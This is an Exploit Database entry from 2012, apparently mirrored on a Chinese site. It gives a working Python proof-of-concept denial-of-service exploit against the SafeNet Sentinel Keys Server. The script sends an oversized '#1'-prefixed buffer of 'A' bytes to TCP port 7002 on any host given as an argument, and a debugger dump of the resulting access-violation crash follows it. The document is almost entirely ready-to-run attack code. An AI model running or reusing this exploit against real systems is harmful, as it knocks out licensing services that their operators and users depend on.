SafeNet Sentinel Keys Server – Crash (PoC)

• Exploit Database
• 15 阅读

• 作者： retset
  日期： 2012-09-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/21508/

• # Exploit Title: SafeNet Sentinel Keys Server DoS 
  # Date: 10 Sep 2012
  # Exploit Author:retset (https://twitter.com/ret5et)
  # Vendor Homepage: http://www.safenet-inc.com/ 
  # Version: Sentinel Protection Installerv7.6.5 (sntlkeyssrvr.exe ver. 1.3.1.3)
  # Download link: http://c3.safenet-inc.com/downloads/8/0/804F8C5F-F88F-4443-8871-2AD993DC33DB/Sentinel%20Protection%20Installer%207.6.5.exe
  # Download link: http://www.safenet-inc.com/support-downloads/sentinel-drivers/ 
  # Tested on: Xp Sp3
  
  import socket
  import sys
  
  if len(sys.argv) < 2:
  	print "usage: %s host"% sys.argv[0]
  	sys.exit(0)
  
  host = sys.argv[1]
  print host
  req= "#1"
  req += 'A' *0x4093
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host,7002))
  s.send(req)
  s.close()
  
  
  """
  (5ec.6f0): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000000 ebx=0045011c ecx=00000003 edx=00b6bf83 esi=00b70000 edi=0045011c
  eip=0040f89b esp=00b65864 ebp=0000407d iopl=0 nv up ei pl zr na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
  *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
  sntlkeyssrvr+0xf89b:
  0040f89b f3a6repe cmps byte ptr [esi],byte ptr es:[edi]
  """